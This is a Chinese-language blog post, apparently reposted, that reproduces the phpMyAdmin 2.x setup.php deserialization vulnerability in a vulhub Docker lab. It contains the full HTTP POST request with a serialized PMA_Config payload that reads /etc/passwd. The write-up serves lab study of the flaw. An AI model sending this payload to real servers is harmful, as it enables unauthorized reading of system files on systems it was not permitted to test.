首页 > Web开发 > 详细

phpmyadmin scriptssetup.php 反序列化漏洞

时间:2021-05-21 22:03:01      阅读:33      评论:0      收藏:0      [点我收藏+]

phpmyadmin scriptssetup.php 反序列化漏洞

phpmyadmin scriptssetup.php 反序列化漏洞(WooYun-2016-199433)

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。


漏洞环境

我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/phpmyadmin/WooYun-2016-199433/
docker-compose up -d

访问IP:8080即可,因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,我们不用管他就行。

技术分享图片


影响版本

phpMyAdmin

2.x


漏洞复现

我们构造URL

POST请求 ip:8080/scripts/setup.php

POST /scripts/setup.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://d2882cd5-38d6-4b0c-9bb9-189722962513
Content-Length: 80
Connection: close
Cookie: pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=0de109133be667550d76562dc3e9ec1f; auto_saved_sql_sort=
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

然后发现能访问passwd内容

技术分享图片

phpmyadmin scriptssetup.php 反序列化漏洞

原文:https://www.cnblogs.com/blankunbeaten/p/14796984.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!